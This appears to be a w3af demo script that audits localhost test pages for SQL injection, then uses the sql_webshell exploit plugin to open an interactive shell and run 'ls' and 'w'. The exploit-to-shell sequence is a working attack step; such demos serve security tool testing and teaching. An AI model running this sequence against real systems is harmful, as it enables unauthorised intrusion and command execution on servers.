# This is a demo of the attack plugin sql_shell

plugins
output console,textFile
output config textFile
set fileName output-w3af.txt
set verbose True
back
output config console
set verbose False
back

audit sqli

discovery webSpider
discovery config webSpider
set onlyForward True
back

back
target
set target http://localhost/w3af/audit/sql_injection/select/sql_injection_string.php?name=andres , http://localhost/writable/
back

start

exploit
exploit sql_webshell

interact 0
ls
w
endInteraction

exit